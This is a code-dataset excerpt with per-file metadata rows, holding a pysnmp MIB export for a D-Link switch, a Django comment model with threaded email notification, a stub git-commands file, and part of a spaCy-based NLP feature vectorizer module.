swL2IGMPMulticastVlanMemberPort=swL2IGMPMulticastVlanMemberPort, swL2LoopDetectRecoverTime=swL2LoopDetectRecoverTime, swL2PortDropCounterTable=swL2PortDropCounterTable, swL2QOSBandwidthPortIndex=swL2QOSBandwidthPortIndex, swL2VlanCurrentTaggedPorts=swL2VlanCurrentTaggedPorts, swL2MulticastRangeEntry=swL2MulticastRangeEntry, swL2VlanMgmt=swL2VlanMgmt, swDevInfoFrontPanelLedStatus=swDevInfoFrontPanelLedStatus, swL2TrafficSegMgmt=swL2TrafficSegMgmt, swDevModuleInfoReversion=swDevModuleInfoReversion, swL2DevCtrlRmonState=swL2DevCtrlRmonState, swL2QOS8021pUserPriorityIndex=swL2QOS8021pUserPriorityIndex, swL2IGMPCtrlTable=swL2IGMPCtrlTable, swL2QOSSchedulingMaxPkts=swL2QOSSchedulingMaxPkts, swDevModuleInfoDescription=swDevModuleInfoDescription, swL2IGMPForwardingPortMember=swL2IGMPForwardingPortMember, 
swL2QOSMgmt=swL2QOSMgmt, swL2IGMPGroupIpAddr=swL2IGMPGroupIpAddr, swCosBandwidthControlEntry=swCosBandwidthControlEntry, swL2DhcpLocalRelayState=swL2DhcpLocalRelayState, swIGMPSnoopingGroupIncludePortMap=swIGMPSnoopingGroupIncludePortMap, swL2IGMPMulticastVlanEntry=swL2IGMPMulticastVlanEntry, swL2TrunkLACPPortState=swL2TrunkLACPPortState, swL2LoopDetectMgmt=swL2LoopDetectMgmt, IANAifMauAutoNegCapBits=IANAifMauAutoNegCapBits, swL2LoopDetectPortState=swL2LoopDetectPortState, swL2TrafficSegTable=swL2TrafficSegTable, swL2PortSecurityAdmState=swL2PortSecurityAdmState, swL2QOSHolPreventionCtrl=swL2QOSHolPreventionCtrl, swL2DevMgmt=swL2DevMgmt, swL2dot1vProtocolPortGroupId=swL2dot1vProtocolPortGroupId, swL2DevCtrlManagementVlanId=swL2DevCtrlManagementVlanId, swL2LoopDetectPortLoopStatus=swL2LoopDetectPortLoopStatus, swL2PortSecurityDelVlanName=swL2PortSecurityDelVlanName, swL2DevCtrlStpState=swL2DevCtrlStpState, swL2IGMPMaxResponseTime=swL2IGMPMaxResponseTime, swL2macNotification=swL2macNotification, swL2TrafficSegEntry=swL2TrafficSegEntry, swL2PortCtrlAutoNegRestart=swL2PortCtrlAutoNegRestart, swL2IGMPMulticastVlanid=swL2IGMPMulticastVlanid, swL2IGMPQueryInfoTable=swL2IGMPQueryInfoTable, swL2MirrorPortSourceEgress=swL2MirrorPortSourceEgress, swL2MultiFilterVid=swL2MultiFilterVid, swL2QOSBandwidthRxRate=swL2QOSBandwidthRxRate, swL2dot1vProtocolGroupTable=swL2dot1vProtocolGroupTable, swL2PortDropCounterPortIndex=swL2PortDropCounterPortIndex, swIGMPSnoopingGroupTable=swIGMPSnoopingGroupTable, swL2MirrorGroupLogicTargetPort=swL2MirrorGroupLogicTargetPort, PortList=PortList, swL2VlanAdvertisementState=swL2VlanAdvertisementState, swL2dot1vProtocolGroupId=swL2dot1vProtocolGroupId, swL2VlanLoopOccurred=swL2VlanLoopOccurred, swL2IGMPMulticastVlanReplacePriority=swL2IGMPMulticastVlanReplacePriority, swL2TrunkCtrlTable=swL2TrunkCtrlTable, swL2PortSecurityMaxLernAddr=swL2PortSecurityMaxLernAddr, swL2DevAlarmLinkChange=swL2DevAlarmLinkChange, swL2IGMPLeaveTimer=swL2IGMPLeaveTimer, swL2PortAutoNegInfoCapReceivedBits=swL2PortAutoNegInfoCapReceivedBits, swL2VlanStaticTaggedPorts=swL2VlanStaticTaggedPorts, swL2MirrorPortSourceIngress=swL2MirrorPortSourceIngress, swDevModuleInfoTable=swDevModuleInfoTable)
mibBuilder.exportSymbols("DGS3612-L2MGMT-MIB", swL2IpLimitedMulticastHead=swL2IpLimitedMulticastHead, swL2TrunkState=swL2TrunkState, swL2TrunkLACPPortEntry=swL2TrunkLACPPortEntry, swL2IGMPRouterStaticPortList=swL2IGMPRouterStaticPortList, swL2MACNotifyState=swL2MACNotifyState, swL2TrunkFloodingPort=swL2TrunkFloodingPort, swL2DhcpLocalRelayVLANState=swL2DhcpLocalRelayVLANState, swCosBandwidthMaxRate=swCosBandwidthMaxRate, swL2DevCtrl=swL2DevCtrl, swL2PortCtrlTable=swL2PortCtrlTable, swL2IGMPSnoopingStaticGroupIPaddress=swL2IGMPSnoopingStaticGroupIPaddress, swL2MulticastRangeTable=swL2MulticastRangeTable, swL2IGMPMulticastVlanRemapPriority=swL2IGMPMulticastVlanRemapPriority, swL2LoopDetectMode=swL2LoopDetectMode, swCpuRxClassID=swCpuRxClassID, swL2TrunkActivePorts=swL2TrunkActivePorts, swl2NotificationBidings=swl2NotificationBidings, swCosBandwidthMinRate=swCosBandwidthMinRate, swL2QOS8021pUserPriorityTable=swL2QOS8021pUserPriorityTable, swL2TrunkCtrlEntry=swL2TrunkCtrlEntry, swL2LoopDetectPortMgmt=swL2LoopDetectPortMgmt, swL2PortInfoErrDisReason=swL2PortInfoErrDisReason, swL2VlanMemberPorts=swL2VlanMemberPorts, swL2LimitedMulticastAddressEntry=swL2LimitedMulticastAddressEntry, swL2PortMulticastDrops=swL2PortMulticastDrops, swDevModuleInfoSerial=swDevModuleInfoSerial, swL2VlanCurrentUntaggedPorts=swL2VlanCurrentUntaggedPorts, swL2QOSBandwidthControlEntry=swL2QOSBandwidthControlEntry, swL2IGMPQueryInfoEntry=swL2IGMPQueryInfoEntry, swL2VlanLoopDetectVID=swL2VlanLoopDetectVID, swDevModuleInfoEntry=swDevModuleInfoEntry, swL2PortCtrlPortIndex=swL2PortCtrlPortIndex, swL2PortSecurityControlTable=swL2PortSecurityControlTable, swL2TrunkVLANEntry=swL2TrunkVLANEntry, swL2MirrorGroupRowStatus=swL2MirrorGroupRowStatus, swL2IGMPInfoEntry=swL2IGMPInfoEntry, swL2PortSecurityDelCtrl=swL2PortSecurityDelCtrl, swL2PortInfoLinkStatus=swL2PortInfoLinkStatus, swL2IGMPQueryInterval=swL2IGMPQueryInterval, swL2IGMPMulticastVlanGroupEntry=swL2IGMPMulticastVlanGroupEntry, swL2TrafficSegForwardPorts=swL2TrafficSegForwardPorts, swCosBandwidthPort=swCosBandwidthPort, swL2LimitedMulticastAddressHead=swL2LimitedMulticastAddressHead, swCpuRxRateControlStatus=swCpuRxRateControlStatus, swL2IGMPSnoopingStaticGroupVID=swL2IGMPSnoopingStaticGroupVID, swL2MirrorGroupState=swL2MirrorGroupState, swL2PortCtrlJumboFrame=swL2PortCtrlJumboFrame, swL2QOS8021pDefaultPriority=swL2QOS8021pDefaultPriority, swL2VlanStaticUntaggedPorts=swL2VlanStaticUntaggedPorts, swL2Notify=swL2Notify, swL2IGMPQueryState=swL2IGMPQueryState, swL2IGMPMulticastVlanName=swL2IGMPMulticastVlanName, swL2IGMPInfoVid=swL2IGMPInfoVid, swL2MirrorMgmt=swL2MirrorMgmt, swL2DevCtrlIGMPSnooping=swL2DevCtrlIGMPSnooping, swL2IGMPMulticastVlanRangeState=swL2IGMPMulticastVlanRangeState, swL2TrafficSegPort=swL2TrafficSegPort, swL2IpLimitedMulticastEntry=swL2IpLimitedMulticastEntry, swL2VlanForbiddenPorts=swL2VlanForbiddenPorts, swL2MirrorPortState=swL2MirrorPortState, swL2dot1vProtocolTemplateFrameType=swL2dot1vProtocolTemplateFrameType, swL2IGMPRouterPortsTable=swL2IGMPRouterPortsTable, swL2QOSSchedulingPort=swL2QOSSchedulingPort, swL2PortCtrlEntry=swL2PortCtrlEntry, swL2IpLimitedMulticastAccess=swL2IpLimitedMulticastAccess, swL2QOSSchedulingMechanismEffec=swL2QOSSchedulingMechanismEffec, swL2MultiFilterEntry=swL2MultiFilterEntry, swL2IGMPQueryVersion=swL2IGMPQueryVersion, swL2DevCtrlLedPOEState=swL2DevCtrlLedPOEState, swL2LoopDetectTrapMode=swL2LoopDetectTrapMode, swL2IpLimitedMulticastTable=swL2IpLimitedMulticastTable, swL2IpLimitedMulticastTail=swL2IpLimitedMulticastTail, 
swL2LoopDetectPortTable=swL2LoopDetectPortTable, swL2LimitedMulticastAddressTable=swL2LimitedMulticastAddressTable, swL2LoopDetectInterval=swL2LoopDetectInterval, swL2MACNotifyHistorySize=swL2MACNotifyHistorySize, swL2PortInfoTable=swL2PortInfoTable, swL2LimitedMulticastAddressTail=swL2LimitedMulticastAddressTail, swL2dot1vProtocolPortRowStatus=swL2dot1vProtocolPortRowStatus, swL2IGMPMgmt=swL2IGMPMgmt, swL2MirrorGroupTable=swL2MirrorGroupTable, swL2TrunkLACPPortIndex=swL2TrunkLACPPortIndex, swL2IGMPRobustness=swL2IGMPRobustness, swL2DevCtrlLLDPState=swL2DevCtrlLLDPState, swL2dot1vProtocolTemplateProtocolValue=swL2dot1vProtocolTemplateProtocolValue)
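# Illustrative query sketch (not part of the generated module): reading one of
# the scalars above with the pysnmp high-level API. The agent address and
# community string are hypothetical, and the example assumes this compiled MIB
# is on the MIB builder's search path.
#
#   from pysnmp.hlapi import *
#   errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(
#       SnmpEngine(), CommunityData('public'),
#       UdpTransportTarget(('192.0.2.1', 161)), ContextData(),
#       ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB',
#                                 'swL2LoopDetectAdminState', 0))))
#   if not errorIndication and not errorStatus:
#       for name, value in varBinds:
#           print(name.prettyPrint(), '=', value.prettyPrint())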
| 155.740704
| 12,771
| 0.791781
|
794da030b15f83eb42186125c67ec69c33836833
| 2,283
|
py
|
Python
|
comment/models.py
|
knightwk/mysite
|
9935b05e97fd5fb0cd57a0e97b8241ee4a8a67a5
|
[
"Apache-2.0"
] | null | null | null |
comment/models.py
|
knightwk/mysite
|
9935b05e97fd5fb0cd57a0e97b8241ee4a8a67a5
|
[
"Apache-2.0"
] | 14
|
2020-06-05T07:13:18.000Z
|
2022-03-11T23:45:57.000Z
|
comment/models.py
|
knightwk/mysite
|
9935b05e97fd5fb0cd57a0e97b8241ee4a8a67a5
|
[
"Apache-2.0"
] | null | null | null |
import threading
from django.db import models
from django.core.mail import send_mail
from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from django.template.loader import render_to_string
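# Sends an HTML email on a background thread so the request that triggered the
# notification is not blocked while the mail backend talks to the SMTP server.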
class SendMail(threading.Thread):
def __init__(self, subject, text, email, fail_silently=False):
self.subject = subject
self.text = text
self.email = email
        self.fail_silently = fail_silently
threading.Thread.__init__(self)
def run(self):
send_mail(self.subject,
'',
settings.EMAIL_HOST_USER,
[self.email],
                  fail_silently=self.fail_silently,
                  html_message=self.text
)
# Create your models here.
class Comment(models.Model):
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
text = models.TextField()
comment_time = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User, related_name="comments", on_delete=models.CASCADE)
root = models.ForeignKey('self', related_name='root_comment', null=True, on_delete=models.CASCADE)
parent = models.ForeignKey('self', related_name='parent_comment', null=True, on_delete=models.CASCADE)
reply_to = models.ForeignKey(User, related_name="replies", null=True, on_delete=models.CASCADE)
def send_mail(self):
if self.parent is None:
            # someone commented on my blog post
            subject = '有人评论你的博客'  # "Someone commented on your blog"
email = self.content_object.get_email()
else:
            # a reply to an existing comment
            subject = '有人回复你的评论'  # "Someone replied to your comment"
email = self.reply_to.email
if email != '':
context = {}
context['comment_text'] = self.text
context['url'] = self.content_object.get_url()
text = render_to_string('comment/send_mail.html', context)
send_mail = SendMail(subject, text, email)
send_mail.start()
def __str__(self):
return self.text
class Meta:
ordering = ['comment_time']
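# Illustrative usage sketch (``blog`` and ``request`` are hypothetical, and the
# target model is assumed to implement the ``get_email()``/``get_url()`` used by
# ``send_mail`` above): the generic relation lets a comment attach to any model
# instance, and ``send_mail`` spawns a SendMail thread so the response is not
# delayed by SMTP.
#
#   from django.contrib.contenttypes.models import ContentType
#   comment = Comment.objects.create(
#       content_type=ContentType.objects.get_for_model(blog),
#       object_id=blog.pk,
#       text='Nice post!',
#       user=request.user,
#   )
#   comment.send_mail()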
| 36.238095
| 106
| 0.657906
|
794da17447a529745c118efb54689f6efa1e34b8
| 51
|
py
|
Python
|
Python/PythonTest.py
|
SPPhotonic/JetsonTX1
|
d0cea6bb34fd8a02e337611c18eebaeb43bbf1e2
|
[
"MIT"
] | null | null | null |
Python/PythonTest.py
|
SPPhotonic/JetsonTX1
|
d0cea6bb34fd8a02e337611c18eebaeb43bbf1e2
|
[
"MIT"
] | null | null | null |
Python/PythonTest.py
|
SPPhotonic/JetsonTX1
|
d0cea6bb34fd8a02e337611c18eebaeb43bbf1e2
|
[
"MIT"
] | null | null | null |
#git init
#git add .
#git commit -m "First commit"
| 12.75
| 29
| 0.666667
|
794da1760b20173f8dc62e0f247a592910815c74
| 26,194
|
py
|
Python
|
src/python/zensols/deepnlp/vectorize/vectorizers.py
|
plandes/deepnlp
|
49820084ccf797d59535d5920559ab768bf2ec73
|
[
"MIT"
] | 7
|
2020-05-11T07:13:56.000Z
|
2021-09-27T13:03:46.000Z
|
src/python/zensols/deepnlp/vectorize/vectorizers.py
|
plandes/deepnlp
|
49820084ccf797d59535d5920559ab768bf2ec73
|
[
"MIT"
] | null | null | null |
src/python/zensols/deepnlp/vectorize/vectorizers.py
|
plandes/deepnlp
|
49820084ccf797d59535d5920559ab768bf2ec73
|
[
"MIT"
] | 1
|
2022-02-12T00:22:26.000Z
|
2022-02-12T00:22:26.000Z
|
"""Generate and vectorize language features.
"""
__author__ = 'Paul Landes'
from typing import List, Tuple, Set, Union, Dict
from dataclasses import dataclass, field
import logging
import sys
from functools import reduce
import torch
from torch import Tensor
from zensols.deeplearn.vectorize import (
VectorizerError,
FeatureContext,
TensorFeatureContext,
SparseTensorFeatureContext,
MultiFeatureContext,
OneHotEncodedEncodableFeatureVectorizer,
)
from zensols.nlp import (
FeatureToken, FeatureSentence, FeatureDocument, TokensContainer,
)
from . import (
SpacyFeatureVectorizer, FeatureDocumentVectorizer,
TextFeatureType, MultiDocumentVectorizer,
)
logger = logging.getLogger(__name__)
@dataclass
class EnumContainerFeatureVectorizer(FeatureDocumentVectorizer):
"""Encode tokens found in the container by aggregating the SpaCy vectorizers
output. The result is a concatenated binary representation of all
configured token level features for each token. This adds only token
vectorizer features generated by the spaCy vectorizers (subclasses of
:class:`.SpacyFeatureVectorizer`), and not the features themselves (such as
``is_stop`` etc).
All spaCy features are encoded given by
:obj:`~.FeatureDocumentVectorizerManager.spacy_vectorizers`.
However, only those given in :obj:`decoded_feature_ids` are produced in the
output tensor after decoding.
The motivation for encoding all, but decoding a subset of features is for
feature selection during training. This is because encoding the features
(in a sparse matrix) takes comparatively less time and space over having to
re-encode all batches.
    Rows are tokens and column intervals are features. The encoded matrix is
sparse, and decoded as a dense matrix.
:shape: (|sentences|, |token length|, |decoded features|)
:see: :class:`.SpacyFeatureVectorizer`
"""
ATTR_EXP_META = ('decoded_feature_ids',)
DESCRIPTION = 'spacy feature vectorizer'
FEATURE_TYPE = TextFeatureType.TOKEN
decoded_feature_ids: Set[str] = field(default=None)
"""The spaCy generated features used during *only* decoding (see class docs).
Examples include ``norm``, ``ent``, ``dep``, ``tag``. When set to
``None``, use all those given in the
:obj:`~.FeatureDocumentVectorizerManager.spacy_vectorizers`.
"""
def _get_shape_with_feature_ids(self, feature_ids: Set[str]):
"""Compute the shape based on what spacy feature ids are given.
:param feature_ids: the spacy feature ids used to filter the result
"""
flen = 0
for fvec in self.manager.spacy_vectorizers.values():
if feature_ids is None or fvec.feature_id in feature_ids:
flen += fvec.shape[1]
return None, self.token_length, flen
def _get_shape_decode(self) -> Tuple[int, int]:
"""Return the shape needed for the tensor when encoding."""
return self._get_shape_with_feature_ids(None)
def _get_shape_for_document(self, doc: FeatureDocument):
"""Return the shape of the vectorized output for the given document."""
return (len(doc.sents),
self.manager.get_token_length(doc),
self._get_shape_decode()[-1])
def _get_shape(self) -> Tuple[int, int]:
"""Compute the shape based on what spacy feature ids are given."""
return self._get_shape_with_feature_ids(self.decoded_feature_ids)
def _populate_feature_vectors(self, sent: FeatureSentence, six: int,
fvec: SpacyFeatureVectorizer, arr: Tensor,
col_start: int, col_end: int):
"""Populate ``arr`` with every feature available from the vectorizer set
defined in the manager. This fills in the corresponding vectors from
the spacy vectorizer ``fvec`` across all tokens for a column range.
"""
attr_name = fvec.feature_id
col_end = col_start + fvec.shape[1]
toks = sent.tokens[:arr.shape[1]]
for tix, tok in enumerate(toks):
val = getattr(tok, attr_name)
vec = fvec.from_spacy(val)
if vec is not None:
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'adding vec {fvec} for {tok}: {vec.shape}')
arr[six, tix, col_start:col_end] = vec
def _encode(self, doc: FeatureDocument) -> FeatureContext:
"""Encode tokens found in the container by aggregating the SpaCy vectorizers
output.
"""
arr = self.torch_config.zeros(self._get_shape_for_document(doc))
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'type array shape: {arr.shape}')
sent: FeatureSentence
for six, sent in enumerate(doc.sents):
col_start = 0
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
self._populate_feature_vectors(
sent, six, fvec, arr, col_start, col_end)
col_start = col_end
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoded array shape: {arr.shape}')
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
def _slice_by_attributes(self, arr: Tensor) -> Tensor:
"""Create a new tensor from column based slices of the encoded tensor for each
specified feature id given in :obj:`decoded_feature_ids`.
"""
keeps = set(self.decoded_feature_ids)
col_start = 0
tensors = []
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'type={fid}, to keep={keeps}')
if fid in keeps:
tensors.append(arr[:, :, col_start:col_end])
keeps.remove(fid)
col_start = col_end
if len(keeps) > 0:
raise VectorizerError(f'Unknown feature type IDs: {keeps}')
sarr = torch.cat(tensors, dim=2)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'slice dim: {sarr.shape}')
return sarr
def to_symbols(self, tensor: Tensor) -> List[List[Dict[str, float]]]:
"""Reverse map the tensor to spaCy features.
:return: a list of sentences, each with a list of tokens, each having a
map of name/count pairs
"""
sents = []
for six in range(tensor.size(0)):
toks = []
sents.append(toks)
for tix in range(tensor.size(1)):
col_start = 0
by_fid = {}
toks.append(by_fid)
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
vec = tensor[six, tix, col_start:col_end]
cnts = dict(filter(lambda x: x[1] > 0,
zip(fvec.as_list, vec.tolist())))
by_fid[fid] = cnts
col_start = col_end
return sents
def _decode(self, context: FeatureContext) -> Tensor:
arr = super()._decode(context)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'decoded features: {self.decoded_feature_ids}, ' +
f'shape: {arr.shape}')
self._assert_decoded_doc_dim(arr, 3)
if self.decoded_feature_ids is not None:
arr = self._slice_by_attributes(arr)
return arr
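# Illustrative sketch (hypothetical helper, not part of the library): the
# encode-everything / decode-a-subset workflow described in the class docs.
# Assumes ``vec`` is a configured EnumContainerFeatureVectorizer and ``doc`` an
# already parsed FeatureDocument; the feature ids are examples only.
def _example_decode_subset(vec, doc):
    ctx = vec.encode(doc)                      # sparse context with all spacy features
    vec.decoded_feature_ids = {'ent', 'tag'}   # narrow the features without re-encoding
    return vec.decode(ctx)                     # dense (|sents|, |tokens|, |ent|+|tag|)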
@dataclass
class CountEnumContainerFeatureVectorizer(FeatureDocumentVectorizer):
"""Vectorize the counts of parsed spaCy features. This generates the count of
tokens as a S X M * N tensor where S is the number of sentences, M is the
number of token feature ids and N is the number of columns of the output of
the :class:`.SpacyFeatureVectorizer` vectorizer. Each column position's
count represents the number of counts for that spacy symol for that index
position in the output of :class:`.SpacyFeatureVectorizer`.
This class uses the same efficiency in decoding features given in
:class:`.EnumContainerFeatureVectorizer`.
:shape: (|sentences|, |decoded features|)
"""
ATTR_EXP_META = ('decoded_feature_ids',)
DESCRIPTION = 'token level feature counts'
FEATURE_TYPE = TextFeatureType.DOCUMENT
decoded_feature_ids: Set[str] = field(default=None)
def _get_shape(self) -> Tuple[int, int]:
"""Compute the shape based on what spacy feature ids are given.
"""
feature_ids = self.decoded_feature_ids
flen = 0
for fvec in self.manager.spacy_vectorizers.values():
if feature_ids is None or fvec.feature_id in feature_ids:
flen += fvec.shape[1]
return -1, flen
def get_feature_counts(self, sent: FeatureSentence,
fvec: SpacyFeatureVectorizer) -> Tensor:
"""Return the count of all tokens as a S X N tensor where S is the number of
sentences, N is the columns of the ``fvec`` vectorizer. Each column
position's count represents the number of counts for that spacy symol
for that index position in the ``fvec``.
"""
fid = fvec.feature_id
fcounts = self.torch_config.zeros(fvec.shape[1])
for tok in sent.tokens:
val = getattr(tok, fid)
fnid = fvec.id_from_spacy(val, -1)
if fnid > -1:
fcounts[fnid] += 1
return fcounts
def _encode(self, doc: FeatureDocument) -> FeatureContext:
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding doc: {doc}')
sent_arrs = []
for sent in doc.sents:
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding sentence: {sent}')
tok_arrs = []
for fvec in self.manager.spacy_vectorizers.values():
cnts: Tensor = self.get_feature_counts(sent, fvec)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding with {fvec}')
tok_arrs.append(cnts)
sent_arrs.append(torch.cat(tok_arrs))
arr = torch.stack(sent_arrs)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoded shape: {arr.shape}')
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
def _slice_by_attributes(self, arr: Tensor) -> Tensor:
"""Create a new tensor from column based slices of the encoded tensor for each
specified feature id given in :obj:`decoded_feature_ids`.
"""
keeps = set(self.decoded_feature_ids)
col_start = 0
tensors = []
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'type={fid}, to keep={keeps}')
if fid in keeps:
keep_vec = arr[:, col_start:col_end]
tensors.append(keep_vec)
keeps.remove(fid)
col_start = col_end
if len(keeps) > 0:
raise VectorizerError(f'Unknown feature type IDs: {keeps}')
sarr = torch.cat(tensors, dim=1)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'slice dim: {sarr.shape}')
return sarr
def to_symbols(self, tensor: Tensor) -> List[Dict[str, float]]:
"""Reverse map the tensor to spaCy features.
:return: a list of sentences, each a map of name/count pairs.
"""
sents = []
for six in range(tensor.size(0)):
col_start = 0
by_fid = {}
sents.append(by_fid)
arr = tensor[six]
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
vec = arr[col_start:col_end]
cnts = dict(filter(lambda x: x[1] > 0,
zip(fvec.as_list, vec.tolist())))
by_fid[fid] = cnts
col_start = col_end
return sents
def _decode(self, context: FeatureContext) -> Tensor:
arr = super()._decode(context)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'decoded features: {self.decoded_feature_ids}, ' +
f'shape: {arr.shape}')
if self.decoded_feature_ids is not None:
arr = self._slice_by_attributes(arr)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'decoded shape: {arr.shape}')
return arr
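# Illustrative sketch (hypothetical helper): round-tripping counts back to
# readable spaCy symbols, e.g. ``[{'tag': {'NN': 2, 'VBD': 1}, ...}]`` for a
# one-sentence document. Assumes ``vec`` is a configured
# CountEnumContainerFeatureVectorizer and ``doc`` a parsed FeatureDocument.
def _example_count_symbols(vec, doc):
    tensor = vec.decode(vec.encode(doc))   # (|sentences|, |decoded features|)
    return vec.to_symbols(tensor)          # one name -> count map per sentence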
@dataclass
class DepthFeatureDocumentVectorizer(FeatureDocumentVectorizer):
"""Generate the depths of tokens based on how deep they are in a head
dependency tree.
Even though this is a document level vectorizer and is usually added in a
join layer rather than stacked on to the embedded layer, it still assumes
congruence with the token length, which is used in its shape.
    **Important**: do not combine sentences into a single document with
    :meth:`FeatureDocument.combine_sentences` since features are created as a
    dependency parse tree at the sentence level. Otherwise, the dependency
    relations are broken, resulting in a zeroed tensor.
:shape: (|sentences|, token length, 1)
"""
DESCRIPTION = 'head depth'
FEATURE_TYPE = TextFeatureType.TOKEN
def _get_shape(self) -> Tuple[int, int]:
return -1, self.token_length, 1
def encode(self, doc: Union[Tuple[FeatureDocument], FeatureDocument]) -> \
FeatureContext:
ctx: TensorFeatureContext
if isinstance(doc, (tuple, list)):
self._assert_doc(doc)
docs = doc
comb_doc = FeatureDocument.combine_documents(docs)
n_toks = self.manager.get_token_length(comb_doc)
arrs = tuple(map(lambda d:
self._encode_doc(d.combine_sentences(), n_toks),
docs))
arr = torch.cat(arrs, dim=0)
arr = arr.unsqueeze(-1)
ctx = SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
else:
ctx = super().encode(doc)
return ctx
def _encode(self, doc: FeatureDocument) -> FeatureContext:
n_toks = self.manager.get_token_length(doc)
arr = self._encode_doc(doc, n_toks)
arr = arr.unsqueeze(-1)
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
def _encode_doc(self, doc: FeatureDocument, n_toks: int) -> Tensor:
n_sents = len(doc.sents)
arr = self.torch_config.zeros((n_sents, n_toks))
u_doc = doc.uncombine_sentences()
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding doc: {len(doc)}/{len(u_doc)}: {doc}')
        # if the doc is several sentences combined into one, unpack and
        # write all features in one row
if len(doc) != len(u_doc):
soff = 0
for sent in u_doc.sents:
self._transform_sent(sent, arr, 0, soff, n_toks)
soff += len(sent)
else:
# otherwise, each row is a separate sentence
for six, sent in enumerate(doc.sents):
self._transform_sent(sent, arr, six, 0, n_toks)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoded shape: {arr.shape}')
return arr
def _transform_sent(self, sent: FeatureSentence, arr: Tensor,
six: int, soff: int, slen: int):
head_depths = self._get_head_depth(sent)
for tix, tok, depth in head_depths:
off = tix + soff
val = 1. / depth
in_range = (off < slen)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'setting ({six}, {off}) = {val}: set={in_range}')
if in_range:
arr[six, off] = val
def _dep_branch(self, node: FeatureToken, toks: Tuple[FeatureToken],
tid_to_idx: Dict[int, int], depth: int,
depths: Dict[int, int]) -> \
Dict[FeatureToken, List[FeatureToken]]:
idx = tid_to_idx.get(node.i)
if idx is not None:
depths[idx] = depth
for c in node.children:
cix = tid_to_idx.get(c)
if cix is not None:
child = toks[cix]
self._dep_branch(child, toks, tid_to_idx, depth + 1, depths)
def _get_head_depth(self, sent: FeatureSentence) -> \
Tuple[Tuple[int, FeatureToken, int]]:
"""Calculate the depth of tokens in a sentence.
        :param sent: the sentence containing the tokens for which to get depths
:return: a tuple of (sentence token index, token, depth)
"""
tid_to_idx: Dict[int, int] = {}
toks = sent.tokens
for i, tok in enumerate(toks):
tid_to_idx[tok.i] = i
if logger.isEnabledFor(logging.DEBUG):
logger.debug('|'.join(
map(lambda t: f'{tid_to_idx[t.i]}:{t.i}:{t.text}({t.dep_})',
sent.token_iter())))
logger.debug(f'tree: {sent.dependency_tree}')
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'tokens: {toks}')
root = tuple(
filter(lambda t: t.dep_ == 'ROOT' and not t.is_punctuation, toks))
if len(root) == 1:
root = root[0]
tree = {tid_to_idx[root.i]: 0}
self._dep_branch(root, toks, tid_to_idx, 1, tree)
return map(lambda x: (x[0], toks[x[0]], x[1]), tree.items())
else:
return ()
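# Worked example (hypothetical sentence): after ``_dep_branch`` runs, the
# dependency root effectively sits at depth 1, so for "the dog ran" the root
# "ran" is encoded as 1/1 = 1.0, its direct dependent "dog" as 1/2 = 0.5, and
# "the" (attached under "dog") as 1/3 ~= 0.33; positions past the sentence
# length stay 0.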
@dataclass
class OneHotEncodedFeatureDocumentVectorizer(
FeatureDocumentVectorizer, OneHotEncodedEncodableFeatureVectorizer):
"""Vectorize nominal enumerated features in to a one-hot encoded vectors. The
feature is taken another vectorizer indicated by the feature ID specified
with the :obj:`feature_id`.
:shape: (-1, |token length|, |categories|)
"""
DESCRIPTION = 'encoded feature document vectorizer'
FEATURE_TYPE = TextFeatureType.TOKEN
feature_attribute: Tuple[str] = field(default=None)
"""The feature attributes to vectorize."""
def __post_init__(self):
super().__post_init__()
self.optimize_bools = False
def _get_shape(self) -> Tuple[int, int]:
return -1, self.token_length, super()._get_shape()[1]
def _encode(self, doc: FeatureDocument) -> FeatureContext:
slen = len(doc)
tlen = self.manager.get_token_length(doc)
attr = self.feature_attribute
arr = self.torch_config.zeros((slen, tlen, self.shape[2]))
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'vectorizing: {attr} for token length: {tlen} ' +
f'in to {arr.shape}')
for six, sent in enumerate(doc.sents):
feats = tuple(map(lambda s: getattr(s, attr), sent))
self._encode_cats(feats, arr[six])
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'vectorized: {len(doc)} sents in to {arr.shape}')
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
@dataclass
class StatisticsFeatureDocumentVectorizer(FeatureDocumentVectorizer):
"""Vectorizes basic surface language statics which include:
* character count
* token count
* min token length in characters
* max token length in characters
* average token length in characters (|characters| / |tokens|)
* sentence count (for FeatureDocuments)
* average sentence length (|tokens| / |sentences|)
* min sentence length
* max sentence length
:shape: (9,)
"""
DESCRIPTION = 'statistics'
